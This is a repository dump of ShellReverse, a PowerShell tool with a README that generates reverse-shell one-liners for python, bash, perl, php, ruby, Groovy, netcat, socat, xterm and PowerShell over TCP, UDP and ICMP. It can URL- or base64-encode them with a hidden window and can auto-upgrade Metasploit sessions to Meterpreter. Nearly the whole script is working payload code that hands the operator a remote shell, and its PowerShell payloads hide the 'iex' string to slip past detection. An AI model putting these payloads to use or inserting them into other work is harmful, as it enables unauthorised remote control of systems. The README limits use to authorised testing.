├── README.md
├── example.gif
└── shell-reverse.ps1

/README.md:
--------------------------------------------------------------------------------
# ShellReverse

ShellReverse is a small PowerShell script that (1) eases the creation of a reverse shell one-liner, with a different payload depending on which interpreter is available on the target (python, python3, bash, perl, php, ruby, java, netcat, socat, xterm, or PowerShell over TCP, UDP or ICMP), and (2) automates upgrading the resulting Metasploit session to Meterpreter. Use it only against systems you are authorized to test.

# Usage

Its syntax is very simple:

    ./shell-reverse.ps1 -Lhost 10.10.10.1 -Lport 4444 -<payload> [-web] [-metasploit]

- `-<payload>`: one of `-python`, `-python3`, `-bash`, `-perl`, `-php`, `-ruby`, `-java`, `-netcat`, `-socat`, `-xterm`, `-PowershellTCP`, `-PowershellUDP`, `-PowershellICMP`
- `-web`: URL-encode the payload so it can be placed in a query string (the PowerShell payloads are additionally emitted as a base64 `-enc` command line)
- `-metasploit`: write a Metasploit resource file, start `msfconsole` with it and leave a handler waiting; the first session it receives is upgraded to Meterpreter with `post/multi/manage/shell_to_meterpreter`

# Install in Debian or Kali

The steps below were written for PowerShell 6.0.0-alpha.13. Note that they fetch `.deb` packages over plain HTTP and install them with `dpkg -i` without verifying a checksum or signature, so a network attacker could substitute a package whose maintainer scripts then run as root; on a current system prefer the signed PowerShell packages from Microsoft's apt repository and skip the manual downloads. Also note that the clone creates a directory named `ReverseShell`, not `shellreverse`.

    git clone https://github.com/Hackplayers/ReverseShell
    cd ReverseShell
    sudo apt-get update > /dev/null
    wget http://http.us.debian.org/debian/pool/main/libu/libunwind/libunwind8_1.1-4.1_amd64.deb
    sudo dpkg -i libunwind8_1.1-4.1_amd64.deb
    wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
    sudo dpkg -i libicu55_55.1-7_amd64.deb
    wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
    sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
    powershell
    ./shell-reverse.ps1 -Lhost 192.168.1.20 -Lport 4444 -<payload>

# Languages

- **Perl**
- **Python**
- **Python3**
- **Ruby**
- **PHP**
- **Java**
- **Bash**
- **Netcat**
- **PowershellTCP**
- **PowershellUDP**
- **PowershellICMP**

# Video Example
![](https://github.com/cybervaca/ShellReverse/blob/master/example.gif)

# AutoUpdate to Meterpreter
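# shell-reverse.ps1
#
# Generate a reverse-shell one-liner for a chosen interpreter and, optionally,
# start a Metasploit handler that upgrades the incoming session to Meterpreter.
#
# Parameters:
#   -Lhost / -Lport   listener address and port baked into every payload (mandatory)
#   -web              emit the payload URL-encoded; the PowerShell payloads are also
#                     emitted as a base64 "-enc" command line
#   -metasploit       write a msfconsole resource file and start msfconsole with it
#   -UpgradePort      port that post/multi/manage/shell_to_meterpreter listens on
#                     for the staged Meterpreter (must be reachable from the target)
#   payload switches  -netcat -python -python3 -bash -perl -php -ruby -java -xterm
#                     -socat -PowershellICMP -PowershellTCP -PowershellUDP
#
# Fixes over the previous revision (each is also commented at its site):
#   * -Lport was never validated (the check compared $Lhost with "" twice).
#   * -xterm on its own was rejected as "no language selected".
#   * encodedurl left '%', '&', '#', '+', '?' and '<' unencoded, so e.g.
#     "bash -i >& /dev/tcp/... 0>&1" was cut at the '&' inside a query string; its
#     trailing Substring() truncation was dead code (the result was never returned).
#   * the base64 "-enc" line used '+' as a URL space but did not escape the '+',
#     '/' and '=' of the base64 alphabet.
#   * the resource file was written to the fixed path /tmp/reverse_shell.rc and then
#     executed by msfconsole (it contains Ruby), so another local user could plant
#     or symlink it. A private temp file is used now.
#   * shell_to_meterpreter always targeted "session 1" instead of the detected session.
#   * $env:Temp in the ICMP payload expanded on the operator's machine at generation
#     time (leaking the operator's profile path) instead of on the target.
#   * the UDP payload wrapped $Lhost in double quotes, which both the outer
#     `powershell.exe -c "..."` wrapper and encodebase64's quote stripping break.
#   * the java here-string was not closed on its own line, so it swallowed the
#     $r_xterm assignment and -xterm printed nothing.
#   * the perl TTY hint used an em dash ("—e") instead of "-e"; the bash hint was a
#     Python-REPL snippet that does nothing in a shell.
#   * the <ruby>...</ruby> markers and the "<...>" part of the netcat backpipe line
#     were missing from the copy this revision was made from (most likely stripped as
#     HTML tags); without the markers msfconsole treats the Ruby lines as console
#     commands. Both have been restored.

param(
    [string]$Lhost = $null,
    [string]$Lport = $null,
    [switch]$web,
    [switch]$netcat,
    [switch]$python,
    [switch]$python3,
    [switch]$bash,
    [switch]$perl,
    [switch]$php,
    [switch]$ruby,
    [switch]$java,
    [switch]$xterm,
    [switch]$socat,
    [switch]$metasploit,
    [switch]$PowershellICMP,
    [switch]$PowershellTCP,
    [switch]$PowershellUDP,
    [int]$UpgradePort = 12345
)

function Write-Tag {
    # Print the coloured "[+]" prefix used in front of every status line.
    Write-Host "[" -ForegroundColor Green -NoNewline
    Write-Host "+" -ForegroundColor red -NoNewline
    Write-Host "]" -ForegroundColor Green -NoNewline
}

function New-MsfResource {
    # Build the msfconsole resource script for one handler payload.
    # The <ruby> block polls framework.sessions until at least one session exists,
    # runs post/multi/manage/shell_to_meterpreter against every session found
    # (by its real id, not a hard-coded "1") and then stops.
    # $Lhost, $Lport and $UpgradePort are expanded here, on the operator side.
    param([string]$Payload)
    return @"
use exploit/multi/handler
set payload $Payload
set LHOST $Lhost
set LPORT $Lport
set ExitOnSession false
exploit -j -z

<ruby>
sleep(1)
print_status("Esperando session para actualizarla a meterpreter")
upgraded = false
until upgraded
  framework.sessions.each_pair do |sid, _s|
    print_status("Detectada nueva session")
    self.run_single("use post/multi/manage/shell_to_meterpreter")
    self.run_single("set SESSION #{sid}")
    self.run_single("set LHOST $Lhost")
    self.run_single("set LPORT $UpgradePort")
    self.run_single("exploit")
    upgraded = true
  end
  sleep(1)
end
print_status("Shell actualizada a meterpreter")
</ruby>
"@
}

$banner1 = @"

██▀███ ▓█████ ██▒ █▓▓█████ ██▀███ ██████ ▓█████ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓██ ▒ ██▒▓█ ▀▓██░ █▒▓█ ▀ ▓██ ▒ ██▒▒██ ▒ ▓█ ▀ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▓██ ░▄█ ▒▒███ ▓██ █▒░▒███ ▓██ ░▄█ ▒░ ▓██▄ ▒███ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒██▀▀█▄ ▒▓█ ▄ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄ ▒ ██▒▒▓█ ▄ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░██▓ ▒██▒░▒████▒ ▒▀█░ ░▒████▒░██▓ ▒██▒▒██████▒▒░▒████▒ ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░ ▒▓ ░▒▓░░░ ▒░ ░ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░░░ ▒░ ░ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░▒ ░ ▒░ ░ ░ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░░ ░ ░ ░░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░


CyberVaca @ HackPlayers
"@

Write-Host $banner1 -ForegroundColor red

# Both listener values are mandatory: every payload interpolates them, and the port
# is pasted unquoted into python/ruby/php code, so it must be a plain number.
if ([string]::IsNullOrEmpty($Lhost) -or [string]::IsNullOrEmpty($Lport)) {
    Write-Tag; Write-Host " Debes indicar -Lhost y -Lport `n`n" -ForegroundColor red
    return
}
if ($Lport -notmatch '^\d{1,5}$' -or [int]$Lport -lt 1 -or [int]$Lport -gt 65535) {
    Write-Tag; Write-Host " -Lport debe ser un numero entre 1 y 65535 `n`n" -ForegroundColor red
    return
}

# ---------------------------------------------------------------- payloads ----
# Each here-string is expanded on the operator side: $Lhost/$Lport are baked in,
# anything that must stay literal for the target is backtick-escaped.

$r_socat = @"
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$Lhost`:$Lport
"@

# Classic FIFO backpipe for a netcat without -e. The "<...>" part of this line was
# missing from the previous copy (it reads like an HTML tag) and is restored here.
$r_netcat = @"
mknod /tmp/backpipe p ; /bin/sh 0</tmp/backpipe | nc $Lhost $Lport 1>/tmp/backpipe
"@

$r_python = @"
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$Lhost",$Lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
"@

$r_bash = @"
bash -i >& /dev/tcp/$Lhost/$Lport 0>&1
"@

$r_perl = @"
perl -e 'use Socket;`$i="$Lhost";`$p=$Lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(`$p,inet_aton(`$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
"@

$r_php = @"
php -r '`$sock=fsockopen("$Lhost",$Lport);exec("/bin/sh -i <&3 >&3 2>&3");'
"@

$r_ruby = @"
ruby -rsocket -e'f=TCPSocket.open("$Lhost",$Lport).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
"@

# Groovy snippet (e.g. for a Jenkins script console). "\$line" is a Groovy escape
# so the target's bash, not Groovy, expands the variable.
# The closing "@ must start its own line, otherwise the here-string runs on and
# swallows the next assignment.
$r_java = @"
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$Lhost/$Lport;cat <&5 | while read line; do \`$line 2>&5 >&5; done"] as String[])
p.waitFor()
"@

$r_xterm = @"
xterm -display $Lhost":"$Lport
"@

# The three PowerShell payloads build an alias for Invoke-Expression from character
# indexes of 'cabesha-ei-chixaka' (indexes -9, -10 and -4 spell i, e, x) so the
# literal "iex" never appears in the one-liner.
# ICMP variant: every prompt/output chunk travels as the data of an echo request
# and commands are read back from the echo reply. `$env:Temp is escaped so it is
# resolved on the target, not here.
$r_PowershellICMP = @"
powershell.exe -c "`$ip='$Lhost'; `$x = 'cabesha-ei-chixaka'; Set-alias cabesha-ei-chixaka (`$x[`$true-10] + (`$x[[byte]('0x' + 'FF') - 265]) + `$x[[byte]('0x' + '9a') - 158]);`$ic=New-Object Net.NetworkInformation.Ping; `$po=New-Object Net.NetworkInformation.PingOptions; `$po.DontFragment=`$true; function f(`$b) { `$ic.Send(`$ip,60000,([text.encoding]::ASCII).GetBytes(`$b),`$po) }; `$p = -join('PS ',(gl).path,'> '); f(`$p); while (`$true) { `$r = f(''); if (!`$r.Buffer) { continue }; `$rs=([text.encoding]::ASCII).GetString(`$r.Buffer); if (`$rs.StartsWith('EXIT')) { exit }; if (`$rs.StartsWith('UPLOAD')) { [io.file]::AppendAllText('`$env:Temp\a',`$rs.Substring(7)); f('.'); } else { try { `$rt=(cabesha-ei-chixaka -Command `$rs | Out-String); } catch { f(`$_) }; `$i=0; while (`$i -lt `$rt.length-120) { f(`$rt.Substring(`$i,120)); `$i -= -120; }; f(`$rt.Substring(`$i)); `$p = -join('PS ',(gl).path,'> '); f(`$p); }; }"
"@

$r_PowershellTCP = @"
powershell.exe -c "`$x = 'cabesha-ei-chixaka'; Set-alias cabesha-ei-chixaka (`$x[`$true-10] + (`$x[[byte]('0x' + 'FF') - 265]) + `$x[[byte]('0x' + '9a') - 158]);`$c = New-Object Net.Sockets.TCPClient('$Lhost',$Lport);`$str = `$c.GetStream();[byte[]]`$b = 0..65535|%{0};while((`$i = `$str.Read(`$b, 0, `$b.Length)) -ne 0){;`$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$b,0, `$i);`$sendback = (cabesha-ei-chixaka `$d 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sb = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$str.Write(`$sb,0,`$sb.Length);`$str.Flush()};`$c.Close()"
"@

# UDP variant binds local port 53 on the target. $Lhost is single-quoted: an inner
# double quote would end the outer "powershell.exe -c" string, and encodebase64
# strips double quotes anyway.
$r_PowershellUDP = @"
powershell.exe -c "`$x = 'cabesha-ei-chixaka'; Set-alias cabesha-ei-chixaka (`$x[`$true-10] + (`$x[[byte]('0x' + 'FF') - 265]) + `$x[[byte]('0x' + '9a') - 158]);`$end = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse('$Lhost'),$Lport);`$c = New-Object System.Net.Sockets.UDPClient(53);[byte[]]`$bytes = 0..65535|%{0};`$sb = ([text.encoding]::ASCII).GetBytes('PS> ');`$c.Send(`$sb,`$sb.Length,`$end);while(`$true){;`$receivebytes = `$c.Receive([ref]`$end);`$returndata = ([text.encoding]::ASCII).GetString(`$receivebytes);`$sendback = (cabesha-ei-chixaka `$returndata 2>&1 | Out-String );`$sb = ([text.encoding]::ASCII).GetBytes(`$sendback);`$c.Send(`$sb,`$sb.Length,`$end)};`$c.Close()"
"@

# ---------------------------------------------------------------- encoders ----

function encodebase64 {
    # Turn a `powershell.exe -c "..."` one-liner into a "-enc" command line meant to
    # be placed in a URL. The wrapper and all double quotes are stripped, the body is
    # encoded as UTF-16LE base64 (what -EncodedCommand expects), and the base64 is
    # percent-encoded so its own '+', '/' and '=' survive URL decoding ('+' in the
    # surrounding text stands for a space).
    param([string]$script)
    $body = ($script -replace "powershell.exe -c", "") -replace '"', ""
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($body)
    $b64 = [Convert]::ToBase64String($bytes)
    Write-Host ("powershell.exe+-win+hidden+-enc+" + [System.Uri]::EscapeDataString($b64))
}

function encodedurl {
    # Percent-encode a payload for use as a URL query value. RFC 3986 unreserved
    # characters pass through; everything else is escaped, including '%', '&', '#',
    # '+', '?' and '<' that the previous hand-written -replace chain missed (an
    # unescaped '&' splits the payload into a second query parameter).
    param([string]$script)
    return [System.Uri]::EscapeDataString($script)
}

# ---------------------------------------------------------------- dispatch ----

# payload switch -> generated one-liner
$payloads = [ordered]@{
    netcat         = $r_netcat
    python         = $r_python
    python3        = ($r_python -replace "python", "python3")
    bash           = $r_bash
    perl           = $r_perl
    php            = $r_php
    ruby           = $r_ruby
    java           = $r_java
    xterm          = $r_xterm
    socat          = $r_socat
    PowershellICMP = $r_PowershellICMP
    PowershellTCP  = $r_PowershellTCP
    PowershellUDP  = $r_PowershellUDP
}

# payload switch -> whether the caller asked for it (-xterm is included now)
$switches = [ordered]@{
    netcat = $netcat; python = $python; python3 = $python3; bash = $bash; perl = $perl
    php = $php; ruby = $ruby; java = $java; xterm = $xterm; socat = $socat
    PowershellICMP = $PowershellICMP; PowershellTCP = $PowershellTCP; PowershellUDP = $PowershellUDP
}

# payload switch -> hint for getting a proper TTY once the shell is in
$ttyHints = @{
    python3 = "python3 -c 'import pty; pty.spawn(`"/bin/bash`")'"
    python  = "python -c 'import pty; pty.spawn(`"/bin/bash`")'"
    bash    = "python -c 'import pty; pty.spawn(`"/bin/bash`")'"
    perl    = "perl -e 'exec `"/bin/bash`";'"
    ruby    = "ruby: exec `"/bin/bash`""
    socat   = "python -c 'import pty; pty.spawn(`"/bin/bash`")'"
}

# payload switch -> Metasploit handler payload (same mapping as before; the
# PowerShell payloads and socat have no handler here)
$msfPayloads = @{
    python  = 'cmd/unix/reverse_python'
    python3 = 'cmd/unix/reverse_python'
    bash    = 'cmd/unix/reverse_netcat'
    netcat  = 'cmd/unix/reverse_netcat'
    perl    = 'cmd/unix/reverse_perl'
    ruby    = 'cmd/unix/reverse_ruby'
    php     = 'php/reverse_php'
    java    = 'java/shell/reverse_tcp'
    xterm   = 'cmd/unix/generic'
}

$chosen = @($switches.Keys | Where-Object { $switches[$_] })
if ($chosen.Count -eq 0) {
    Write-Tag; Write-Host " Debes seleccionar el lenguaje de la shell `n`n" -ForegroundColor red
    return
}

Write-Tag; Write-Host " Tu shell reversa es : `n`n" -ForegroundColor Green
foreach ($name in $chosen) {
    $shell = $payloads[$name]
    if ($web) {
        if ($name -like 'Powershell*') {
            encodebase64 -script $shell
            Write-Host "`n"
            Write-Tag; Write-Host " Tu shell urlencoded : `n`n" -ForegroundColor Green
        }
        Write-Host "$(encodedurl -script $shell) `n"
    } else {
        Write-Host $shell "`n"
    }
}

foreach ($name in $chosen) {
    if ($ttyHints.ContainsKey($name)) {
        Write-Tag; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green
        Write-Host $ttyHints[$name]
    }
}

if ($metasploit) {
    foreach ($name in $chosen) {
        if (-not $msfPayloads.ContainsKey($name)) {
            Write-Tag; Write-Host "Metasploit no compatible con $name (proximas updates...)`n"
            continue
        }
        # Private, unpredictable temp file: msfconsole evaluates the <ruby> block in
        # this file, so a fixed /tmp path could be pre-created or symlinked by another
        # local user and run with the operator's privileges. The file is removed once
        # msfconsole exits.
        $rc = [System.IO.Path]::GetTempFileName()
        try {
            New-MsfResource -Payload $msfPayloads[$name] | Out-File -Encoding ascii -FilePath $rc
            msfconsole -r $rc
        } finally {
            Remove-Item -Path $rc -ErrorAction SilentlyContinue
        }
    }
}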